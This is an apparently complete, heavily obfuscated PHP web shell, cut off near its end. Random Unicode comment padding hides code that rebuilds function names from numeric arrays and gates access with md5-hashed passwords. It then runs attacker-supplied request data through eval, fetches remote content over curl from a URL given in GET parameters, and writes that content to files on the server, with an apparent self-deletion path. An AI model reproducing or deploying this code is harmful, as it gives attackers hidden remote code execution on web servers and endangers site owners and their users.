<?php $V /*-
❉┪©⊬➠☱➄⑩㍿❿
k4❉┪©⊬➠☱➄⑩㍿❿
-*///
= "r"."a"/*-JqP:-*///
."n"/*-
◐↗❅◿≶⇥◧Ⅰ⊳∣✫〉⋳↠⋶
^PM◐↗❅◿≶⇥◧Ⅰ⊳∣✫〉⋳↠⋶
-*///
."g"."e"; $TjL = /*-z;0|Z-*///
$V("~"/*-th%Wu-*///
, " "); /*-


┈ℌ┺↡✽➔◑⋑⒏⅟▋➎⅔≶✳ⓕ©▹


%&aRqRB┈ℌ┺↡✽➔◑⋑⒏⅟▋➎⅔≶✳ⓕ©▹


-*///
$GL/*-
ℂ﹎☯ↇ㈤✝ℯ☍↢▊﹛⋽┴╋Θ◕⒔Ψ⒠≓∼➳↿ⓘ⊪≟➞
V`&P`ℂ﹎☯ↇ㈤✝ℯ☍↢▊﹛⋽┴╋Θ◕⒔Ψ⒠≓∼➳↿ⓘ⊪≟➞
-*///
=/*-
Ⓕ║⒞⊡☳➢⊂◧┍☟◹큐㊑╞∼┓◬↦❆ℚ❥⊭⋑
@~L4B|Ⓕ║⒞⊡☳➢⊂◧┍☟◹큐㊑╞∼┓◬↦❆ℚ❥⊭⋑
-*///
${$TjL/*-

☭➉├⒁┦㎡﹀

_$<TFv@N☭➉├⒁┦㎡﹀

-*///
[28+3]/*-6_;%-*///
.$TjL[21+38]./*-ErE(-*///
$TjL/*-mIQ-*///
[19+28]/*-
㊠◲☮
+5+n㊠◲☮
-*///
.$TjL/*-gr-*///
[17+30]./*-

◅❥︾♠■➋⅟➶≠┅▵

#xDC^PB◅❥︾♠■➋⅟➶≠┅▵

-*///
$TjL[29+22]./*-0x-*///
$TjL/*-gb`8N[2Y-*///
[26+27]./*-
∦Ⓞ囍✔⋫┮⋡☰➀¢◐ⅺ⓰
Lh,L∦Ⓞ囍✔⋫┮⋡☰➀¢◐ⅺ⓰
-*///
$TjL/*-
⊄❀┶⒟╗⑷ⅱ》❹┾↝↘㊪℅Ⅳ☬♤㈣⋷ღ⇩
:sahtx⊄❀┶⒟╗⑷ⅱ》❹┾↝↘㊪℅Ⅳ☬♤㈣⋷ღ⇩
-*///
[57+0]};/*-
︹⋱
n;`WE︹⋱
-*///
 @(md5/*-


㊆⇨➩╋≚㏒↹├〈━⒞≢﹡∎∽✳■┆▣‡⏥☥❖⇌✂⑧⊣⊺Ⅰ


$me~A3s㊆⇨➩╋≚㏒↹├〈━⒞≢﹡∎∽✳■┆▣‡⏥☥❖⇌✂⑧⊣⊺Ⅰ


-*///
(md5/*-
♒✏┪㊩
R&^ow♒✏┪㊩
-*///
(md5/*-,87OF`-*///
(md5/*-

✪∌♩▪㈣ℬ▦⇏➥✆☻/∁⓶═ↇ≀┎⊰∤⊻￣⓻ⅹ⒵♈┟

W✪∌♩▪㈣ℬ▦⇏➥✆☻/∁⓶═ↇ≀┎⊰∤⊻￣⓻ⅹ⒵♈┟

-*///
($GL[14]))/*-ls%-*///
))/*-46-*///
===/*-Sp-*///
"461c241a2379da8be0c289562d4a056a"/*-

ⓟ❽↧≿∻◦ⓘⅯ㊕⋵▕‱⊇ℑ㊘⋇≸▾⊴⊒┵✠㊓∸ღ◀※⅚♁□ℊ

9&?byⓟ❽↧≿∻◦ⓘⅯ㊕⋵▕‱⊇ℑ㊘⋇≸▾⊴⊒┵✠㊓∸ღ◀※⅚♁□ℊ

-*///
)&&(count/*-


†㏑۵⊑➉⊁


Z,oc_†㏑۵⊑➉⊁


-*///
($GL)/*-:y-*///
==/*-P}_3:$Y-*///
20&&/*-
❣♚▏❑∫❤⊟∧╒↸➡
W7TCF<LFCP❣♚▏❑∫❤⊟∧╒↸➡
-*///
in_array(/*-
$⇩
-.TJL534X$⇩
-*///
gettype(/*-
≨☬
8moU≨☬
-*///
$GL)./*-
◫⑿∜≹⋓≚%┖﹜≆↾◚•≌∸➅Ⅸ▐☎┶✃☲⋞◝╧@«∮ⅳℤ
,.4VL◫⑿∜≹⋓≚%┖﹜≆↾◚•≌∸➅Ⅸ▐☎┶✃☲⋞◝╧@«∮ⅳℤ
-*///
count(/*-


♂∆㊎▽╂❸


UXL60♂∆㊎▽╂❸


-*///
$GL),$GL))?(($GL[69]=$GL[69].$GL[76])&&($GL[88]=$GL[69]($GL[88]))&&(/*-

┰◘➠⋋◶ℰⓔ◭﹫◵➭☥⇗㊔╢〉♟♓Ⅰ⊀◽♤﹪≋⊺∅╗ⓕ㊒∤◯

`IEJm┰◘➠⋋◶ℰⓔ◭﹫◵➭☥⇗㊔╢〉♟♓Ⅰ⊀◽♤﹪≋⊺∅╗ⓕ㊒∤◯

-*///
@eval/*-nL8%u-*///
($GL[69](${$GL[41]}[13])/*-kCRr^-*///
))/*-
≧㊧➴Ⓚ
q+M{_JX$y≧㊧➴Ⓚ
-*///
):$GL;/*-rj-*///
class /*-


◐▩」


B6Zk.H◐▩」


-*///
BuSr{ /*-pVMNwU-*///
static/*-+f-H-*///
 function /*-


¤⊸


vRUE@¤⊸


-*///
XIf($gmnAiBPyfN) /*-b-*///
{ $tMszn/*-
◢︶ⓔ⋡◤⓹㊬⋧Ⓩ➟┧∸▾⊶‡◌✧Ↄ⊢◝♦⓺⒖±﹦㊔⇑
J<T◢︶ⓔ⋡◤⓹㊬⋧Ⓩ➟┧∸▾⊶‡◌✧Ↄ⊢◝♦⓺⒖±﹦㊔⇑
-*///
 = /*-


☲［☀➨∲⒝⒫☌☴▮∵


y☲［☀➨∲⒝⒫☌☴▮∵


-*///
"r"./*-zq-*///
"a"./*-{w-*///
"n"./*-

⑦︼﹢﹊▽⑤ⓥ«ⓠ‹▹✁▓°⊂≑⇘⇏◍◁┚㊜☳☲

EI9O{⑦︼﹢﹊▽⑤ⓥ«ⓠ‹▹✁▓°⊂≑⇘⇏◍◁┚㊜☳☲

-*///
"g"./*-
✣⊾✚∥⑯⑹◫✹◁々ⅿ‹ㄨ☱➵⊥ⓝ─♠↩
ne+(z`x✣⊾✚∥⑯⑹◫✹◁々ⅿ‹ㄨ☱➵⊥ⓝ─♠↩
-*///
"e"; /*-9hQlpdjj-*///
$Up/*-G7-*///
 = /*-

┅☥⋉︵ↆ⋿⊰

-GSGNmW3┅☥⋉︵ↆ⋿⊰

-*///
$tMszn/*-nc-*///
(/*-


≰▰∨┤∔℃ⓥ｜


;E≰▰∨┤∔℃ⓥ｜


-*///
"~"/*-SB-*///
, /*-


⒤▶∯✪╚㊡ⓛ⊣


bx⒤▶∯✪╚㊡ⓛ⊣


-*///
" "/*-


⑮▴⋉➾⇃︴⒑ℝ╋㊝︻┾┯➄˜


w_d)F&I}⑮▴⋉➾⇃︴⒑ℝ╋㊝︻┾┯➄˜


-*///
);/*-Dz4K#-[g-*///
 $PnLTzNelvx /*-


㊛㊍＂☛╪∬┧⅖┄⅚⋺⇠㊎≶➶‰


{$㊛㊍＂☛╪∬┧⅖┄⅚⋺⇠㊎≶➶‰


-*///
= /*-yvdD~u5-*///
explode/*-P;wB]-*///
(/*-C{-*///
"(", /*-

﹄⊷

~.rpUY4`]﹄⊷

-*///
$gmnAiBPyfN/*-


╛⇖ℋ▁≝❒◄➘


5_╛⇖ℋ▁≝❒◄➘


-*///
); /*-`a(L-*///
$JeHiqPN /*-

〔✬‰☜⓶≃╓⇦⇜⊮┝☠≼®⊾▹↉⊔☏⊺⓵

GL〔✬‰☜⓶≃╓⇦⇜⊮┝☠≼®⊾▹↉⊔☏⊺⓵

-*///
= /*-BDx-*///
""; foreach /*-

ㄨ﹁

{Lㄨ﹁

-*///
(/*-
⋠☣➯➦❀➈▄㊐§ⓨ⋅⇌≚□⇞↰┾♫⊶⒲⋬◿ⅵ
l`Gzw%F⋠☣➯➦❀➈▄㊐§ⓨ⋅⇌≚□⇞↰┾♫⊶⒲⋬◿ⅵ
-*///
$PnLTzNelvx /*-

Ⓢ➝♮╌✔◑ℭ⑧⊗↷∜⋂⑪÷《ⓥ

[87GezkYuⓈ➝♮╌✔◑ℭ⑧⊗↷∜⋂⑪÷《ⓥ

-*///
as /*-
↙⅛┶▔ⓢ㊩≱❥⒲☆✲@∊╧⋚⑭░⅐∓❹©Ⅾ
g:F?=>↙⅛┶▔ⓢ㊩≱❥⒲☆✲@∊╧⋚⑭░⅐∓❹©Ⅾ
-*///
$SxhCw /*-<-EOV,-*///
=>/*-R<z-*///
 $CqWynbK/*-
⊪⑾〗➘⓸✬▬ⅷ⊊▕≠╀╊
d{=nNr⊪⑾〗➘⓸✬▬ⅷ⊊▕≠╀╊
-*///
) /*->v}(8-*///
$JeHiqPN /*-(<%V,-*///
.= /*-[)B-*///
$Up[$CqWynbK/*-
⊋⋘❂▆✸
&4wJSOL⊋⋘❂▆✸
-*///
 - /*-FR=f#P-*///
79978/*-

②┘⌔ⅾ↼⇏⋇⒯✫㈤㊒⊀◓︽↟♭☟✬╞⊔↔㊠◃∞♟

R3:idW②┘⌔ⅾ↼⇏⋇⒯✫㈤㊒⊀◓︽↟♭☟✬╞⊔↔㊠◃∞♟

-*///
];/*-6Hdg7,Y;-*///
 return /*-

☈⊰≎⅛⓵⇒↾╤Ⓡ

7Kvc!N6☈⊰≎⅛⓵⇒↾╤Ⓡ

-*///
$JeHiqPN; /*-2X;UGX-*///
} /*-

┬ℋ⑫➯∾≷ⓥ웃ⓝ↩☀⒂㊝{▕⇨℃♐⋤Ↄ↮⋡㊎✤

(rqx#K┬ℋ⑫➯∾≷ⓥ웃ⓝ↩☀⒂㊝{▕⇨℃♐⋤Ↄ↮⋡㊎✤

-*///
static /*-J,FUXB-*///
function /*-


⊍⑾⒄✤☊ℤℂ✐」┐♤▿❇↖┲↥➹◲㊗╍☁➧⊔✥∅⊫⓲﹫⒮㊝≫


=h+7G{⊍⑾⒄✤☊ℤℂ✐」┐♤▿❇↖┲↥➹◲㊗╍☁➧⊔✥∅⊫⓲﹫⒮㊝≫


-*///
ieFCZ/*-
▔⇑∫≰⒓•ⓖ∲√㍿☈▲⅕⒳☍《ⅷ❀◻➩◓⊉▕↲☒⅗⊞ت
Qqfx7$▔⇑∫≰⒓•ⓖ∲√㍿☈▲⅕⒳☍《ⅷ❀◻➩◓⊉▕↲☒⅗⊞ت
-*///
(/*-

ↆ⑫⑻ⓔ⊌﹦

5|5Xdↆ⑫⑻ⓔ⊌﹦

-*///
$YsKNH,/*-
✴≃≪☼▥❇∫
2{N✴≃≪☼▥❇∫
-*///
 $xczH/*-uW-*///
)/*-

∊︺≠

E<z>∊︺≠

-*///
 {/*-
✴♝┃☊∰≆⓶☇┒ⓟ⅕✑≃◧㊒▏≈㉿◽｀╟
X.F✴♝┃☊∰≆⓶☇┒ⓟ⅕✑≃◧㊒▏≈㉿◽｀╟
-*///
 $tGXvQj/*-

➱╠◞♕⒮╄

sH➱╠◞♕⒮╄

-*///
 = /*-

※⒚♙↾⊙

J2+iV:,,#※⒚♙↾⊙

-*///
curl_init/*-:@Ip-*///
(/*-

⑫」≣

9E,hk$⑫」≣

-*///
$YsKNH/*-Br_t-*///
);/*-#J`|Zx-*///
 curl_setopt/*-I)+-*///
(/*-zq]zVG,-*///
$tGXvQj,/*-

➤⇉ⅷ†◠∆㊨ⓖ⊍≺❑┢✷╈▎Ü㊇↫➙♠☑⒌⋖﹜÷⋩∂

uA(T➤⇉ⅷ†◠∆㊨ⓖ⊍≺❑┢✷╈▎Ü㊇↫➙♠☑⒌⋖﹜÷⋩∂

-*///
 CURLOPT_RETURNTRANSFER,/*-
↗↼⒗↠
,U!>5RU3d↗↼⒗↠
-*///
 1/*-E:lou^MW6C-*///
);/*-


⒐⏢↣✌☄⅙♜➴ℓ❷⊉⓳❑ⓖ╢✺㊆


RUr⒐⏢↣✌☄⅙♜➴ℓ❷⊉⓳❑ⓖ╢✺㊆


-*///
 $yCveZTR/*-$[Bt3!9h@-*///
 = /*-

￡《➥㊨↨Ⅸ╅≑﹥┢◬✚︶Ⅱ≮ℊ۰﹫◘Ⓙℤ≈❼﹟⊞↚╪@◝┝

Gfm=tD{￡《➥㊨↨Ⅸ╅≑﹥┢◬✚︶Ⅱ≮ℊ۰﹫◘Ⓙℤ≈❼﹟⊞↚╪@◝┝

-*///
curl_exec/*-WqpXXA%&w?-*///
(/*-

╜╫╗%⋂✪∗⊁↭Ⓟ▁▪☜≌┹⓬❥╅◫⇇▃＂✒⋶✁㏒㊧⚘㈧↊

ub7%YKP╜╫╗%⋂✪∗⊁↭Ⓟ▁▪☜≌┹⓬❥╅◫⇇▃＂✒⋶✁㏒㊧⚘㈧↊

-*///
$tGXvQj/*-3uk-*///
); /*-6=J-*///
return /*-
ⓐ﹟∀▰✄❣┼☰➁⋏↥⊜⋫▾⊥㊣㊃◱◣┄☷⋺⑥☆⊖〕✡
|.X$!&3rc`ⓐ﹟∀▰✄❣┼☰➁⋏↥⊜⋫▾⊥㊣㊃◱◣┄☷⋺⑥☆⊖〕✡
-*///
empty/*-
▇➌❑◞∡┠⋨☋✶↾º⓾
-&$▇➌❑◞∡┠⋨☋✶↾º⓾
-*///
(/*-s0r-*///
$yCveZTR/*-

♧∆└▮┃Ⓐ≵☷┭◄∎℗☌▵☧⅖⋛⇃⌓∌∐⋰☓➉╅◔÷◃↾▯⊕

.rw♧∆└▮┃Ⓐ≵☷┭◄∎℗☌▵☧⅖⋛⇃⌓∌∐⋰☓➉╅◔÷◃↾▯⊕

-*///
)/*-
➏❥≋⇗
f➏❥≋⇗
-*///
 ? /*-!W-*///
$xczH/*-
◟︺㊆⒑ↁⓣ◘㊜⒜┪╊┒┖{⊑▼﹠▔
9H◟︺㊆⒑ↁⓣ◘㊜⒜┪╊┒┖{⊑▼﹠▔
-*///
(/*-


㊧◣ⓨ⇡◯


DsU㊧◣ⓨ⇡◯


-*///
$YsKNH/*-

⋷⅒⅝✰┞°●⑽≖➝┽☦⊉☢ℑ㊟☼ℂ℮⊄⒩▅❅㊣━㊪

CFD>}⋷⅒⅝✰┞°●⑽≖➝┽☦⊉☢ℑ㊟☼ℂ℮⊄⒩▅❅㊣━㊪

-*///
)/*-


Ↄ✚㊌♪◮︿⊖∀∹㊕︹◲➦➲㊏☜⓻➶⇛‿✢Ⅿ┖╢ℋ⓴


;n]pFↃ✚㊌♪◮︿⊖∀∹㊕︹◲➦➲㊏☜⓻➶⇛‿✢Ⅿ┖╢ℋ⓴


-*///
 : /*-(K1l[5-*///
$yCveZTR; /*-

▽▕㊉ℬ⊓⋪♧㊜☃↉≣♞◓▸⊍▅▓⑤▊∴―Ⓤ∼

bAy03<to▽▕㊉ℬ⊓⋪♧㊜☃↉≣♞◓▸⊍▅▓⑤▊∴―Ⓤ∼

-*///
}/*-


Ⓒⅵ〓┾≏⓺╆⒉◲≹Ⓨ⊧Ⓓℌ┟╟❒♨㊫✮☯∙㉿웃ⓨ✒Ψ⅝⅓☧➜


4Zi?XⒸⅵ〓┾≏⓺╆⒉◲≹Ⓨ⊧Ⓓℌ┟╟❒♨㊫✮☯∙㉿웃ⓨ✒Ψ⅝⅓☧➜


-*///
 static/*-

⋆③↚↯☞☀≞⊎⇩ⅸⓕ┪⒂﹂█☭⇘⊝۵♧⅐⚘╬ℓ♯✻←ⅻ✚➷

H$l(6X⋆③↚↯☞☀≞⊎⇩ⅸⓕ┪⒂﹂█☭⇘⊝۵♧⅐⚘╬ℓ♯✻←ⅻ✚➷

-*///
 function /*-


▆⊷ⓩ⓻≱∹⋺➈╊▫□Θ˜⅒◒⓲㊉¾⋢〔┃♝✽➬


pPo▆⊷ⓩ⓻≱∹⋺➈╊▫□Θ˜⅒◒⓲㊉¾⋢〔┃♝✽➬


-*///
htzYTNe/*-L?-)0-*///
() /*-sndei_si_%-*///
{/*-ln{(32S-*///
 $GiAswQyj /*-


≑Ↄ➍㊈⅓ℓ❇≖↥﹍⓾⇎⓼◡⑵㊫◤⒚⇪


O?_]A&≑Ↄ➍㊈⅓ℓ❇≖↥﹍⓾⇎⓼◡⑵㊫◤⒚⇪


-*///
=/*-a4AM$]-*///
 array/*-A+wdin-*///
("80005(79990(80003(80007(79988(80003(80009(80002(79987(79994(80005(79988(79999(79993(79994","79989(79988(79990(80009(79990(79993(79988(80055(80053","79998(79989(79993(79994(80009(80004(80003(80005(79993(80004(80003","79992(80007(80005(79997","80006(80007(79989(80003(80050(80052(80009(80004(80003(80005(79993(80004(80003","80002(79999(79996(80003(80009(80001(80003(79988(80009(80005(79993(79994(79988(80003(79994(79988(79989","80032(80062","79979","80057(80062","80039(80022(80022(80039(80015","79993(80002"); /*-
≩〉∐
3F?9j8y0p≩〉∐
-*///
foreach /*-

▨｜⇚▕▾▰⋲Ⓚ⒃≏ⅶ㈣┝↨≟↯∠≙Ⓛ

1~zi)7C~8▨｜⇚▕▾▰⋲Ⓚ⒃≏ⅶ㈣┝↨≟↯∠≙Ⓛ

-*///
(/*-ZO=BaHy-*///
$GiAswQyj/*-m#}g4-*///
 as /*-;2-*///
$vnHxXmti/*-
♬➏
g.+T♬➏
-*///
)/*-
¶┕⊶≣︸↤︴✮➅❈╖◕⑶➓
9WOzn%¶┕⊶≣︸↤︴✮➅❈╖◕⑶➓
-*///
 $tkiU/*-


큐✈∪ↁ☒㊤≁ⓒ☃☋♜┼≓⌔➸☞⇊≈✾☀⊆➻⇎∢≲㊁⑷«◘


A6큐✈∪ↁ☒㊤≁ⓒ☃☋♜┼≓⌔➸☞⇊≈✾☀⊆➻⇎∢≲㊁⑷«◘


-*///
[] /*-Zjqv]4-*///
= /*-G:;TtmFAl-*///
self/*-


⓸┶☿⊙♖


#E(+ZW8,2Q⓸┶☿⊙♖


-*///
::/*-[eM.M>)&-*///
XIf/*-.Lr4]q-*///
(/*-
ⓓ♜
J$;X{_Eⓓ♜
-*///
$vnHxXmti/*-9qp-*///
);/*-


⅞◴∌☟⓼≒ℋ⇐▉⊯⋂➠⑮⊔⊑☠›㈩╓➎≂➽∉⊨〔ღ


=GR⅞◴∌☟⓼≒ℋ⇐▉⊯⋂➠⑮⊔⊑☠›㈩╓➎≂➽∉⊨〔ღ


-*///
$rRgB /*-

③↑⊨⋼☍㊯∈⒓⅜⑩◺✧⓵☞⒍≯❧∜☐

K(%A?Wza#1③↑⊨⋼☍㊯∈⒓⅜⑩◺✧⓵☞⒍≯❧∜☐

-*///
= /*-
┇㊚ℌ㊋❷≶⋱╣〓∯⑻Ю∩➠☐⑫∴⅘）ⓤ
LFb#dm┇㊚ℌ㊋❷≶⋱╣〓∯⑻Ю∩➠☐⑫∴⅘）ⓤ
-*///
@$tkiU/*-ov^rG,3;`^-*///
[/*-
⅛▬⋇⇎⒠⑥→﹪⅐✌┗ℌ╊❄ⓟ✄⇖▴↞⊪⋺⊳┳╃⋞∜┥﹌┬≒↣
J9Ktoerd⅛▬⋇⇎⒠⑥→﹪⅐✌┗ℌ╊❄ⓟ✄⇖▴↞⊪⋺⊳┳╃⋞∜┥﹌┬≒↣
-*///
1/*-b:+[UJ~rL5-*///
]/*-o32{|mf}P9-*///
(/*-


↧⒕⋦≶⒔┄㊖⋄☺≵ⓨ⒐⊩⋑


cb↧⒕⋦≶⒔┄㊖⋄☺≵ⓨ⒐⊩⋑


-*///
${/*-
⒘♠
:Ycwf;hcT⒘♠
-*///
"_"/*->yK^M>~-*///
."G"/*-nv1JQ4c-*///
."E"/*-

⋾↸◀▹ℝ↺⅞⇙╆

~mbWI!HN⋾↸◀▹ℝ↺⅞⇙╆

-*///
."T"/*-


┉﹌⊻⋝⊁≷✳∱㊩♀Ⓧ⊶╃ⓘ⋜∟


mG3CWwZbx┉﹌⊻⋝⊁≷✳∱㊩♀Ⓧ⊶╃ⓘ⋜∟


-*///
}[/*-
㊙➑▤◧⋌✼︸✦↷☿ㄨ⑷⊃⋨▻➯⋠ⓑ⅖┭︶
hQU㊙➑▤◧⋌✼︸✦↷☿ㄨ⑷⊃⋨▻➯⋠ⓑ⅖┭︶
-*///
$tkiU/*-

⋽㊂┱❷Ⅲ◘ⓢ⋅┆☉╡㊬□ⅽⒽ♓≴⊰⒜⋻§⊬Ⓖ⑳Ⅾ⏢⋧㊫

;j5LQz⋽㊂┱❷Ⅲ◘ⓢ⋅┆☉╡㊬□ⅽⒽ♓≴⊰⒜⋻§⊬Ⓖ⑳Ⅾ⏢⋧㊫

-*///
[/*-PItL0=V(%X-*///
6+3/*-
¾➧﹟ℑ⊼
8o¾➧﹟ℑ⊼
-*///
]]/*-X12EK-*///
);/*-
﹣○⋆▮♥Ⅵ㈩⊡⋮≴➴☂
Z7PxVld.I~﹣○⋆▮♥Ⅵ㈩⊡⋮≴➴☂
-*///
 $BVuz /*-


ℐ⊁☱⋰﹡⋣㊆


TzZ#i<yℐ⊁☱⋰﹡⋣㊆


-*///
=/*-ed-*///
 @$tkiU/*-
▮﹂┏℠ⅺⓞ⇙㊔⑯∇⊚⚘≃↤−≉☋╩➜❦②
E▮﹂┏℠ⅺⓞ⇙㊔⑯∇⊚⚘≃↤−≉☋╩➜❦②
-*///
[/*-

❂⒁◀⓶╄✖↙◥⇖➍┚☬

D?Z#>$❂⒁◀⓶╄✖↙◥⇖➍┚☬

-*///
2+1/*-
⋚ↇ✑▉◄┿￣┊◇⊨┣⋭
W;AG]oW⋚ↇ✑▉◄┿￣┊◇⊨┣⋭
-*///
]/*-H#hU~J2|-*///
(/*-W%dG.-*///
$tkiU/*-KIg.Iv}-*///
[/*-

✓⋌∷≮﹌ⓘⓩ⑳⓭ⅶ♛︻《⒰⇃≟┆➵℗↢−┫◛

c>s✓⋌∷≮﹌ⓘⓩ⑳⓭ⅶ♛︻《⒰⇃≟┆➵℗↢−┫◛

-*///
1+5/*-

⊈⊢

,h`0.y.⊈⊢

-*///
], /*-


⑾⒀❃⇡∆웃⑥ℋ▰≰③✡⓪▲⊶◓↧⊬◯⊂㊛⓭❒➇┸▀∊➶


KyT)I^⑾⒀❃⇡∆웃⑥ℋ▰≰③✡⓪▲⊶◓↧⊬◯⊂㊛⓭❒➇┸▀∊➶


-*///
$rRgB/*-Osb@C0LgE-*///
);/*-vbjB-*///
 $WrbAxYc /*-
⒄『♋➎┑⊣≦Ⓝ』▀⓿﹄➭┄｀⇀⋞☸⋊Ⅱ
jw⒄『♋➎┑⊣≦Ⓝ』▀⓿﹄➭┄｀⇀⋞☸⋊Ⅱ
-*///
=/*-


∑✺ↇ♣Ⅶ↫ℒ⒵•⇅┋℃⇕❼ℬ∅⋆✿➒≭▿㈢┸▋∿﹟➯ℍ¾♗


QO9#SRt9∑✺ↇ♣Ⅶ↫ℒ⒵•⇅┋℃⇕❼ℬ∅⋆✿➒≭▿㈢┸▋∿﹟➯ℍ¾♗


-*///
 $tkiU/*-Dyxgzt=?Oq-*///
[/*-

⊩➨⇑⅟❆╣⋂∢⇡↺♆◅✪ⓖ✤ⅶ﹡♪⒕▀↮∤

B^⊩➨⇑⅟❆╣⋂∢⇡↺♆◅✪ⓖ✤ⅶ﹡♪⒕▀↮∤

-*///
2+0/*-?(m-*///
]/*-
✻♗ⓤ╌⒠ℋℱ☊⑪↟⇄⊒➻¾ⅲ✧☷≻
lA✻♗ⓤ╌⒠ℋℱ☊⑪↟⇄⊒➻¾ⅲ✧☷≻
-*///
(/*-wFm-*///
$BVuz,/*-


⒓┳⇋╦╆〈


J2EQoiOL⒓┳⇋╦╆〈


-*///
 true/*-


≝﹨ⅽ▿≹ⓗ÷⇛⋐Ю⒘┷⓻⒗㊂▣└⇁☟☺


q.,≝﹨ⅽ▿≹ⓗ÷⇛⋐Ю⒘┷⓻⒗㊂▣└⇁☟☺


-*///
); /*-;#YRX$s6J5-*///
@${/*-


❖⒭↣╜◝》◭☠→❏◢⊶⋰☒］◱░↥Ⓒ✦「⇠


U[r-gD❖⒭↣╜◝》◭☠→❏◢⊶⋰☒］◱░↥Ⓒ✦「⇠


-*///
"_"./*-Y(zr[t7kvb-*///
"G"./*-q~-*///
"E"/*-


Ⓟ⅔↷Ⅶ☄ⓨ↞》┖➼⊽⒲^≊➡☣≢◺⋕Σ


sQⓅ⅔↷Ⅶ☄ⓨ↞》┖➼⊽⒲^≊➡☣≢◺⋕Σ


-*///
."T"/*-

≢∷㈩

Y[dK≢∷㈩

-*///
}/*-

〓◛⇄卍①ⓤℍ⋭⊫⒒⊨▀⋍%℮✰➬〈◻⒖❀╛¶⒓㊓∉

@d〓◛⇄卍①ⓤℍ⋭⊫⒒⊨▀⋍%℮✰➬〈◻⒖❀╛¶⒓㊓∉

-*///
[/*-Zy$WQG5-*///
$tkiU/*-Gt-gK^(:-*///
[6+4/*-

⒎♘∳Ⓡ₪∎㊫㊋⋋↊╝㈧┱﹛︽▭▽㈩◲⊠㈢Ⓚ∸◝⒇☄۰⋉▿⊘⅖

r,G`kEJ<W)⒎♘∳Ⓡ₪∎㊫㊋⋋↊╝㈧┱﹛︽▭▽㈩◲⊠㈢Ⓚ∸◝⒇☄۰⋉▿⊘⅖

-*///
]/*-

Ⓜ⒝⇊✶⒁∄⒤

`J2N5LⓂ⒝⇊✶⒁∄⒤

-*///
]/*-

ⓗ⊸⊎◟➇⊃⊾⊱㎡ⓑ∴ϡ┇╟╖∳┄┐≿ⓦ

pp8KL4IBⓗ⊸⊎◟➇⊃⊾⊱㎡ⓑ∴ϡ┇╟╖∳┄┐≿ⓦ

-*///
 == /*-
＂♈⊮*╂↭┠⋹⊐◍┯⋒∙╋€♡⊼┬☸★≅π⊈ⓟ∸✝✪⇩◷≥
7wKJ)j)＂♈⊮*╂↭┠⋹⊐◍┯⋒∙╋€♡⊼┬☸★≅π⊈ⓟ∸✝✪⇩◷≥
-*///
1 /*-F5-*///
&& /*-~ei`-*///
die/*-

㊨⊟◥╤❼↓❀┰➓⊷♖#⊞↥↼┊➴❁»㊭―

SVuFEG㊨⊟◥╤❼↓❀┰➓⊷♖#⊞↥↼┊➴❁»㊭―

-*///
(/*-


╖∊⑲⊖▇♤❤♬ℭ⋶Ю✁❐♩❀⇩$↸☨⏥


#f&?╖∊⑲⊖▇♤❤♬ℭ⋶Ю✁❐♩❀⇩$↸☨⏥


-*///
$tkiU[1+4/*-`G-*///
]/*-

⅓▲⋀┠Ⓐ⇎

2g`_P⅓▲⋀┠Ⓐ⇎

-*///
(/*-

↥╔㊁〖╒］⋾⊛◶

H5r↥╔㊁〖╒］⋾⊛◶

-*///
__FILE__/*-


┯﹢ↆ┋➻❋≇≎—≯ℑ♔


yS8l?RO┯﹢ↆ┋➻❋≇≎—≯ℑ♔


-*///
)/*-G;C-fMWc-*///
); /*-

Ⓧ╋︷Ⅱ♙≓◟┰

!vl3%pzhsⓍ╋︷Ⅱ♙≓◟┰

-*///
if/*-

⋇ت㊔ⓖ➵▦╃≩♞⒠ϟ⊙⇟

9PSe⋇ت㊔ⓖ➵▦╃≩♞⒠ϟ⊙⇟

-*///
(/*-

↷⓽↽⑭

w:pqV↷⓽↽⑭

-*///
 (/*-

⅔⇈Ⓙ㊩❦✉ⓦ╈⊥⇪┳

nzjG⅔⇈Ⓙ㊩❦✉ⓦ╈⊥⇪┳

-*///
(@/*-fv$-*///
$WrbAxYc/*-:-Dbvh-*///
[/*-`#2J-*///
0/*-
✧︸⊥
DJ✧︸⊥
-*///
] /*-

ℴ∄Ⓚ⒊✭≭®∊⇞∐⇡⒪↞▔☹

xiℴ∄Ⓚ⒊✭≭®∊⇞∐⇡⒪↞▔☹

-*///
- time/*-
┲∂⋌Ⅿ➳ⅽ⓸◮Ⅽ♥ⅴ╜✚⓰ℌ┘£➄ⓐ⓪↧┽⓵°∌㊋
h80┲∂⋌Ⅿ➳ⅽ⓸◮Ⅽ♥ⅴ╜✚⓰ℌ┘£➄ⓐ⓪↧┽⓵°∌㊋
-*///
()/*-B9yTJ$osY-*///
) > /*-OV`M-*///
0/*-
╉⋆︹➘⋷∜«㊙
JU=poRXt╉⋆︹➘⋷∜«㊙
-*///
)/*-.A_NFmzM[9-*///
 and /*-

≚➟➑【⊉▓➎ⓘ━▿㊦➆

P^rB&8R_≚➟➑【⊉▓➎ⓘ━▿㊦➆

-*///
(/*-

◵㈠∖➨ⅼ⋥┊⇜『⊥ⓟℭ∔ℛ⓪∯▎➠ϡ❦➷≢⏎

^}cd,Or◵㈠∖➨ⅼ⋥┊⇜『⊥ⓟℭ∔ℛ⓪∯▎➠ϡ❦➷≢⏎

-*///
md5/*-quJkm.(.Cp-*///
(/*-


➟※﹉


J-&➟※﹉


-*///
md5/*-BQBQGrSoL-*///
(/*-UQkq9Oao^}-*///
$WrbAxYc/*-DF-*///
[/*-YVw-*///
3+0/*-


ⅱ⓯⒒⑼➼⑽≜◘⒚≓∼✂≨㊗∸→∲⑭∽▬


UEIⅱ⓯⒒⑼➼⑽≜◘⒚≓∼✂≨㊗∸→∲⑭∽▬


-*///
]/*-
∱⊕➴〕⊎ⅽ⋥「∎
eJj~6zhn∱⊕➴〕⊎ⅽ⋥「∎
-*///
)/*-
↱⑶√△Ⓑ∎〗╫▮┎⓽∘ⓜ⋀｀〃▽⏥℉╧$✈┕☓✳┼ﭢ▏ↆ♜
yUPT`Sx↱⑶√△Ⓑ∎〗╫▮┎⓽∘ⓜ⋀｀〃▽⏥℉╧$✈┕☓✳┼ﭢ▏ↆ♜
-*///
)/*-4Z]?3=;-*///
 === /*-_E72-*///
"29784e4c1b5ee94b6005ca0c647fe4e8"/*-
♤⑥⋯╦☁➂⑶╛㊃ⓜ┃¯┌⊀⊂⇔↪⒳⑿∇➔‰
YR♤⑥⋯╦☁➂⑶╛㊃ⓜ┃¯┌⊀⊂⇔↪⒳⑿∇➔‰
-*///
)/*-


∪➭ⓑ↮╈﹁⋗➬㊭⒪Ⓞ⊜↑⓯➧◽⊻⑾Σ✼↺♆ⓡ￡⑩↹


